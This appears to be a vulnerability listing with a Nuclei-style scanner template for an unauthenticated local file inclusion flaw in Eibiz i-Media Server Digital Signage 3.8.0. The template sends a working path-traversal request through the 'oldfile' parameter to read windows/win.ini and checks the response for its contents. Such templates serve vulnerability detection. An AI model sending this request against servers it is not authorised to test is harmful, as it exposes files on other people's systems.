Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
PoC代码[已公开]
id: eibiz-lfi
info:
name: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion
author: 0x_akoko
severity: high
description: Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
reference:
- https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: lfi,eibiz,packetstorm,windows,vuln
http:
- method: GET
path:
- "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# digest: 4a0a00473045022100b42e6a5532c6460e4fde7624f641a753a12ef1769a1ea9b0f676e0760465e3fb0220599e3aaec3b125629c1703a03c1a0a4c1b5ba964b90393b4c508edca3fe333ad:922c64590222798bb761d5b6d8e72950